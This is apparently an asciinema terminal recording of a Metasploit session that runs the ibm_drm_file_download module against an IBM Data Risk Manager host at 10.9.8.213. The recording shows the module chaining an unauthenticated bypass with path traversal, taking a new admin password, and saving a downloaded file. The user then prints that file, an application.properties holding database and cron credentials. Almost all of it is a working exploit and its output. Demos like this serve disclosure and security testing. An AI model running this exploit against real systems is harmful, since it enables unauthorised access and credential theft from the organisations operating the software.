{"version": 2, "width": 191, "height": 53, "timestamp": 1587456899, "env": {"SHELL": "/bin/bash", "TERM": "screen-256color"}}
[0.120479, "o", "\u001b[1m\u001b[38;5;11mmetasploit-framework\u001b[m\u000f\u001b[m\u000f\u001b[38;5;15m \u001b[1m\u001b[m\u000f\u001b[38;5;11m>\u001b[m\u000f\u001b[m\u000f\u001b[38;5;15m \u001b[m\u000f"]
[0.498222, "o", "."]
[0.65424, "o", "/"]
[0.851806, "o", "m"]
[0.945892, "o", "s"]
[1.000372, "o", "f"]
[1.164784, "o", "c"]
[1.221794, "o", "o"]
[1.357433, "o", "n"]
[1.418656, "o", "sole "]
[1.752343, "o", "\r\n"]
[9.2575, "o", "[*] Starting the Metasploit Framework console.../\r"]
[9.358318, "o", "[*] Starting the Metasploit Framework console...-\r"]
[9.458915, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[9.559874, "o", "[*] starting the Metasploit Framework console...|\r"]
[9.671409, "o", "[*] STarting the Metasploit Framework console.../\r"]
[9.824532, "o", "[*] StArting the Metasploit Framework console...-\r"]
[9.926641, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[9.928481, "o", "\u001b[1m\u001b[31m[-]\u001b[0m ***\r\n"]
[9.929109, "o", "\u001b[1m\u001b[31m[-]\u001b[0m * WARNING: No database support: No database YAML file\r\n\u001b[1m\u001b[31m[-]\u001b[0m ***\r\n"]
[10.026936, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[10.236624, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[10.336917, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[10.437157, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[10.537874, "o", "[*] Starting the Metasploit Framework console...|\r"]
[10.638059, "o", "[*] Starting The Metasploit Framework console.../\r"]
[10.738264, "o", "[*] Starting tHe Metasploit Framework console...-\r"]
[10.841268, "o", "[*] Starting thE Metasploit Framework console...\\\r"]
[10.94203, "o", "[*] Starting the Metasploit Framework console...|\r"]
[11.042491, "o", "[*] Starting the metasploit Framework console.../\r"]
[11.144095, "o", "[*] Starting the MEtasploit Framework console...-\r"]
[11.244633, "o", "[*] Starting the MeTasploit Framework console...\\\r"]
[11.34572, "o", "[*] Starting the MetAsploit Framework console...|\r"]
[11.445898, "o", "[*] Starting the MetaSploit Framework console.../\r"]
[11.550534, "o", "[*] Starting the MetasPloit Framework console...-\r"]
[11.650957, "o", "[*] Starting the MetaspLoit Framework console...\\\r"]
[11.751213, "o", "[*] Starting the MetasplOit Framework console...|\r"]
[11.851349, "o", "[*] Starting the MetasploIt Framework console.../\r"]
[11.951499, "o", "[*] Starting the MetasploiT Framework console...-\r"]
[12.151657, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[12.25219, "o", "[*] Starting the Metasploit framework console...|\r"]
[12.352301, "o", "[*] Starting the Metasploit FRamework console.../\r"]
[12.452424, "o", "[*] Starting the Metasploit FrAmework console...-\r"]
[12.552559, "o", "[*] Starting the Metasploit FraMework console...\\\r"]
[12.652699, "o", "[*] Starting the Metasploit FramEwork console...|\r"]
[12.752992, "o", "[*] Starting the Metasploit FrameWork console.../\r"]
[12.853112, "o", "[*] Starting the Metasploit FramewOrk console...-\r"]
[12.953822, "o", "[*] Starting the Metasploit FramewoRk console...\\\r"]
[13.056635, "o", "[*] Starting the Metasploit FrameworK console...|\r"]
[13.156923, "o", "[*] Starting the Metasploit Framework console.../\r"]
[13.257009, "o", "[*] Starting the Metasploit Framework Console...-\r"]
[13.357108, "o", "[*] Starting the Metasploit Framework cOnsole...\\\r"]
[13.457251, "o", "[*] Starting the Metasploit Framework coNsole...|\r"]
[13.557363, "o", "[*] Starting the Metasploit Framework conSole.../\r"]
[13.657606, "o", "[*] Starting the Metasploit Framework consOle...-\r"]
[13.75762, "o", "[*] Starting the Metasploit Framework consoLe...\\\r"]
[13.857752, "o", "[*] Starting the Metasploit Framework consolE...|\r"]
[13.957866, "o", "[*] Starting the Metasploit Framework console.../\r"]
[14.058638, "o", "[*] Starting the Metasploit Framework console...-\r"]
[14.159207, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[14.260336, "o", "[*] Starting the Metasploit Framework console...|\r"]
[14.359488, "o", "[*] Starting the Metasploit Framework console.../\r"]
[14.459913, "o", "[*] Starting the Metasploit Framework console...-\r"]
[14.559991, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[14.660123, "o", "[*] starting the Metasploit Framework console...|\r"]
[14.760263, "o", "[*] STarting the Metasploit Framework console.../\r"]
[14.860407, "o", "[*] StArting the Metasploit Framework console...-\r"]
[14.960531, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[15.060803, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[15.160767, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[15.260935, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[15.361159, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[15.39235, "o", "\r                                                  \r\n"]
[15.392633, "o", "\u001b[0m"]
[15.393954, "o", "\u001b[36m\u001b[1m\u001b[37m\r\n         .                                         .\r\n .\r\n\r\n      \u001b[34mdBBBBBBb  dBBBP dBBBBBBP dBBBBBb  \u001b[37m.                       o\r\n     \u001b[34m  '   dB'                     BBP\r\n    dB'dB'dB' dBBP     dBP     dBP BB\r\n   dB'dB'dB' dBP      dBP     dBP  BB\r\n  dB'dB'dB' dBBBBP   dBP     dBBBBBBB\r\n\r\n                                   \u001b[31mdBBBBBP  \u001b[34mdBBBBBb  dBP    dBBBBP dBP dBBBBBBP\r\n          \u001b[37m.                  \u001b[36m.                  \u001b[34mdB' dBP    dB'.BP\r\n                             \u001b[36m|       \u001b[31mdBP\u001b[34m    dBBBB' dBP    dB'.BP dBP    dBP\r\n                           \u001b[36m--o--    \u001b[31mdBP\u001b[34m    dBP    dBP    dB'.BP dBP    dBP\r\n                             \u001b[36m|     \u001b[31mdBBBBP\u001b[34m dBP    dBBBBP dBBBBP dBP    dBP\u001b[37m\r\n\r\n                                                                    .\r\n                .\r\n        o                  \u001b[32mTo boldly go where no\r\n                            shell has gone before\r\n\u001b[0m\r\n\r\n       =[ \u001b[33mmetasploit v5.0.0-dev-cbe83d4593\u001b[0"]
[15.394059, "o", "m                ]\r\n+ -- --=[ 1845 exploits - 1045 auxiliary - 320 post       ]\r\n+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]\r\n+ -- --=[ 2 evasion                                       ]\r\n+ -- --=[ ** This is Metasploit 5 development branch **   ]\r\n\r\n"]
[15.39451, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Starting persistent handler(s)...\r\n"]
[15.480892, "o", "\u001b[4mmsf5\u001b[0m \u001b[0m> "]
[17.120566, "o", "\r(reverse-i-search)`': "]
[17.373606, "o", "\b\b\bu': run\b\b"]
[17.475889, "o", "\b\b\b\bs': use auxiliary/admin/http/ibm_drm_file_download \r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[17.529942, "o", "\b\b\be': use auxiliary/admin/http/ibm_drm_file_download \r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C"]
[18.461658, "o", "\r\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[4mmsf5\u001b[0m \u001b[0m>\r\u001b[4mmsf5\u001b[0m \u001b[0m> "]
[18.461927, "o", "\r\r\n"]
[18.475121, "o", "\u001b[0m"]
[18.49784, "o", "\u001b[4mmsf5\u001b[0m auxiliary(\u001b[1m\u001b[31madmin/http/ibm_drm_file_download\u001b[0m) \u001b[0m> "]
[19.269002, "o", "\r"]
[19.269346, "o", "\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P(reverse-i-search)`':\u001b[C"]
[19.476733, "o", "\b\b\br': use auxiliary/admin/http/ibm_drm_file_download \b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[19.570626, "o", "\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[P\u001b[Ph': set rhosts 10.9.8.213\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[20.474032, "o", "\r\u001b[4mmsf5\u001b[0m auxiliary(\u001b[1m\u001b[31madmin/http/ibm_drm_file_download\u001b[0m) \u001b[0m> set rhosts 10.9.8.213\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[20.474299, "o", "\r\r\n"]
[20.47801, "o", "\u001b[0m"]
[20.478337, "o", "rhosts => 10.9.8.213\r\n"]
[20.492777, "o", "\u001b[4mmsf5\u001b[0m auxiliary(\u001b[1m\u001b[31madmin/http/ibm_drm_file_download\u001b[0m) \u001b[0m> "]
[21.734368, "o", "i"]
[21.90266, "o", "n"]
[22.167347, "o", "f"]
[22.285394, "o", "o"]
[23.563991, "o", "\r\r\n"]
[23.571717, "o", "\u001b[0m"]
[23.589746, "o", "\r\n       Name: IBM Data Risk Manager Arbitrary File Download\r\n     Module: auxiliary/admin/http/ibm_drm_file_download\r\n    License: Metasploit Framework License (BSD)\r\n       Rank: Normal\r\n  Disclosed: 2020-04-21\r\n\r\nProvided by:\r\n  Pedro Ribeiro <pedrib@gmail.com>\r\n\r\nCheck supported:\r\n  Yes\r\n\r\nBasic options:\r\n  Name       Current Setting                                                               Required  Description\r\n  ----       ---------------                                                               --------  -----------\r\n  FILEPATH   /home/a3user/Tomcat/webapps/albatross/WEB-INF/classes/application.properties  no        Path of the file to download\r\n  Proxies                                                                                  no        A proxy chain of format type:host:port[,type:host:port][...]\r\n  RHOSTS     10.9.8.213                                                                    yes       The target address range or CIDR identifier\r\n  RPORT      8443                            "]
[23.589912, "o", "                                              yes       The target port (TCP)\r\n  SSL        true                                                                          yes       Connect with TLS\r\n  TARGETURI  /                                                                             yes       Default server path\r\n  VHOST                                                                                    no        HTTP server virtual host\r\n\r\nDescription:\r\n  IBM Data Risk Manager (IDRM) contains two vulnerabilities that can \r\n  be chained by an unauthenticated attacker to download arbitrary \r\n  files off the system. The first is an unauthenticated bypass, \r\n  followed by a path traversal. This module exploits both \r\n  vulnerabilities, giving an attacker the ability to download \r\n  (non-root) files. A downloaded file is zipped, and this module also \r\n  unzips it before storing it in the database. At the time of \r\n  disclosure, this is a 0 day. Versions 2.0.3 and 2.0.2 are confirmed \r\n  to be affected, and th"]
[23.589941, "o", "e latest 2.0.6 is most likely affected too. \r\n  Version 2.0.1 is not vulnerable.\r\n\r\nReferences:\r\n  https://cvedetails.com/cve/CVE-TODO/\r\n  https://cvedetails.com/cve/CVE-TODO/\r\n  https://cvedetails.com/cve/CVE-TODO/\r\n  TODO\r\n\r\n"]
[23.605392, "o", "\u001b[4mmsf5\u001b[0m auxiliary(\u001b[1m\u001b[31madmin/http/ibm_drm_file_download\u001b[0m) \u001b[0m> "]
[31.64584, "o", "r"]
[31.701143, "o", "u"]
[31.898134, "o", "n"]
[33.891976, "o", "\r\r\n"]
[33.901339, "o", "\u001b[0m"]
[33.941646, "o", "\r\n"]
[33.942037, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.9.8.213:8443 - Successfully \"stickied\" our session ID XboytrEdzn\r\n"]
[34.064912, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.9.8.213:8443 - We have obtained a new admin password 28010e88-6ffb-46e9-90d6-2ded732120d1\r\n"]
[34.186895, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.9.8.213:8443 - We're now authenticated as admin!\r\n"]
[34.345376, "o", "\u001b[1m\u001b[32m[+]\u001b[0m File saved in: /home/conta/.msf4/loot/20200421151533_default_10.9.8.213_IBM_DRM.http_915173.bin\r\n"]
[34.345752, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Auxiliary module execution completed\r\n"]
[34.365101, "o", "\u001b[4mmsf5\u001b[0m auxiliary(\u001b[1m\u001b[31madmin/http/ibm_drm_file_download\u001b[0m) \u001b[0m> "]
[36.121107, "o", "e"]
[36.300475, "o", "x"]
[36.512173, "o", "i"]
[36.794057, "o", "t"]
[37.933819, "o", "\r\r\n"]
[37.943727, "o", "\u001b[0m"]
[37.994621, "o", "\u001b[1m\u001b[38;5;11mmetasploit-framework\u001b[m\u000f\u001b[m\u000f\u001b[38;5;15m \u001b[1m\u001b[m\u000f\u001b[38;5;11m>\u001b[m\u000f\u001b[m\u000f\u001b[38;5;15m \u001b[m\u000f"]
[42.302574, "o", "b"]
[42.371826, "o", "a"]
[42.529483, "o", "t"]
[42.730754, "o", "c"]
[43.033472, "o", "\u0007"]
[43.832883, "o", "t"]
[44.152457, "o", "\b\u001b[K"]
[44.238598, "o", "a"]
[44.321777, "o", "t"]
[44.444422, "o", " "]
[45.849006, "o", " /home/conta/.msf4/loot/20200421151533_default_10.9.8.213_IBM_DRM.http_915173.bin"]
[46.82208, "o", "\r\n"]
[46.890013, "o", "\u001b[?1h\u001b=\r"]
[46.896032, "o", "\u001b[38;5;238m───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\u001b[m\r\n"]
[46.896167, "o", "       \u001b[38;5;238m│ \u001b[0mFile: \u001b[1m/home/conta/.msf4/loot/20200421151533_default_10.9.8.213_IBM_DRM.http_915173.bin\u001b[0m\u001b[m\r\n\u001b[38;5;238m───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\u001b[m\r\n"]
[46.898085, "o", "\u001b[38;5;238m   1\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231m#Database Properties.\u001b[0m\u001b[m\r\n\u001b[38;5;238m   2\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mspring.database.url=jdbc:postgresql://localhost:5432/a3productiondb_client_release\u001b[0m\u001b[m\r\n"]
[46.898235, "o", "\u001b[38;5;238m   3\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mspring.database.driver=org.postgresql.Driver\u001b[0m\u001b[m\r\n\u001b[38;5;238m   4\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mspring.database.username=postgres\u001b[0m\u001b[m\r\n\u001b[38;5;238m   5\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mspring.database.password=m4/7fCrjCtyk1SG0x2joiuPZHHV6AHOshP+MEeozjoM=\u001b[0m\u001b[m\r\n\u001b[38;5;238m   6\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mspring.database.max.connection.size=200\u001b[0m\u001b[m\r\n"]
[46.898671, "o", "\u001b[38;5;238m   7\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[m\r\n\u001b[38;5;238m   8\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231m#Hibernate Properties.\u001b[0m\u001b[m\r\n\u001b[38;5;238m   9\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231m#spring.jpa.hibernate.dialect=org.hibernate.dialect.MySQL5InnoDBDialect\u001b[0m\u001b[m\r\n\u001b[38;5;238m  10\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mspring.jpa.hibernate.dialect=org.hibernate.dialect.PostgreSQL95Dialect\u001b[0m\u001b[m\r\n"]
[46.898879, "o", "\u001b[38;5;238m  11\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mspring.jpa.hibernate.show_sql=false\u001b[0m\u001b[m\r\n\u001b[38;5;238m  12\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mentitymanager.packages.to.scan=com.a3.albatross.models\u001b[0m\u001b[m\r\n\u001b[38;5;238m  13\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231m#spring.jpa.hibernate.ddl-auto=create-drop\u001b[0m\u001b[m\r\n\u001b[38;5;238m  14\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mspring.jpa.hibernate.hbm2ddl.auto=none\u001b[0m\u001b[m\r\n\u001b[38;5;238m  15\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mspring.jpa.hibernate.format_sql=false\u001b[0m\u001b[m\r\n"]
[46.898931, "o", "\u001b[38;5;238m  16\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mspring.jpa.hibernate.cache.provider_class=org.hibernate.cache.HashtableCacheProvider\u001b[0m\u001b[m\r\n\u001b[38;5;238m  17\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[m\r\n\u001b[38;5;238m  18\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231m#Login attempts\u001b[0m\u001b[m\r\n\u001b[38;5;238m  19\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231ma3-account.lockout.attempts=3\u001b[0m\u001b[m\r\n\u001b[38;5;238m  20\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[m\r\n\u001b[38;5;238m  21\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231m#Multipart File Uploading Properties\u001b[0m\u001b[m\r\n\u001b[38;5;238m  22\u001b[0m   \u001b"]
[46.899089, "o", "[38;5;238m│\u001b[0m \u001b[38;5;231mspring.servlet.multipart.max-file-size=1024MB\u001b[0m\u001b[m\r\n\u001b[38;5;238m  23\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mspring.servlet.multipart.max-request-size=1024MB\u001b[0m\u001b[m\r\n\u001b[38;5;238m  24\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[m\r\n\u001b[38;5;238m  25\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231m#Task Scheduler Max Pool Size\u001b[0m\u001b[m\r\n\u001b[38;5;238m  26\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mtask.scheduler.max.pool.size=10\u001b[0m\u001b[m\r\n\u001b[38;5;238m  27\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[m\r\n\u001b[38;5;238m  28\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231m#Guardium fetch size\u001b[0m\u001b[m\r\n\u001b[38;5;238m  29\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mguardium.fetch.size=10000\u001b[0m\u001b[m\r\n\u001b[38;5;238m  30\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[m\r\n\u001b[38;5;238m  31\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231m#ActiveMQ properties\u001b[0m\u001b[m\r\n"]
[46.899126, "o", "\u001b[38;5;238m  32\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mactiveMQConnectionFactory.brokerURL=tcp://localhost:61616\u001b[0m\u001b[m\r\n\u001b[38;5;238m  33\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mfileListenerContainer.destinationName= jms.file.share\u001b[0m\u001b[m\r\n\u001b[38;5;238m  34\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b["]
[46.899243, "o", "38;5;231mwebserviceListenerContainer.destinationName=jms.webservice.share\u001b[0m\u001b[m\r\n\u001b[38;5;238m  35\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mactivemq.message.queue.size=1\u001b[0m\u001b[m\r\n\u001b[38;5;238m  36\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mclient.updates.location=/home/testuser/agile3/client_updates/\u001b[0m\u001b[m\r\n\u001b[38;5;238m  37\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mexternal.libs.location=/path/to/external/lib\u001b[0m\u001b[m\r\n\u001b[38;5;238m  38\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mserver.cron.account=avorVlfuRH+XIOjIgpbJqVAMDxC1qAM5JmgFpBbQeWA=\u001b[0m\u001b[m\r\n\u001b[38;5;238m  39\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[m\r\n\u001b[38;5;238m  40\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231m#Actuator properties\u001b[0m\u001b[m\r\n"]
[46.899299, "o", "\u001b[38;5;238m  41\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mmanagement.endpoints.enabled-by-default=false\u001b[0m\u001b[m\r\n\u001b[38;5;238m  42\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mmanagement.endpoint.metrics.enabled=true\u001b[0m\u001b[m\r\n"]
[46.899431, "o", "\u001b[38;5;238m  43\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mmanagement.endpoint.health.enabled=true\u001b[0m\u001b[m\r\n\u001b[38;5;238m  44\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mmanagement.endpoint.health.show-details=ALWAYS\u001b[0m\u001b[m\r\n\u001b[38;5;238m  45\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mmanagement.endpoints.jmx.exposure.include=health\u001b[0m\u001b[m\r\n\u001b[38;5;238m  46\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mmanagement.endpoints.web.base-path=/\u001b[0m\u001b[m\r\n\u001b[38;5;238m  47\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mmanagement.endpoints.web.path-mapping.health=healthcheck\u001b[0m\u001b[m\r\n\u001b[38;5;238m  48\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[38;5;231mmanagement.endpoints.web.path-mapping.metrics==metrics\u001b[0m\u001b[m\r\n\u001b[38;5;238m  49\u001b[0m   \u001b[38;5;238m│\u001b[0m \u001b[m\r\n:\u001b[K"]
[52.571631, "o", "\r\u001b[K\u001b[?1l\u001b>"]
[52.576891, "o", "\u001b[1m\u001b[38;5;11mmetasploit-framework\u001b[m\u000f\u001b[m\u000f\u001b[38;5;15m \u001b[1m\u001b[m\u000f\u001b[38;5;11m>\u001b[m\u000f\u001b[m\u000f\u001b[38;5;15m \u001b[m\u000f"]
[53.088625, "o", "e"]
[53.269748, "o", "x"]
[53.403884, "o", "i"]
[53.537517, "o", "t"]
[53.693761, "o", "\r\n"]
[53.693889, "o", "exit\r\n"]
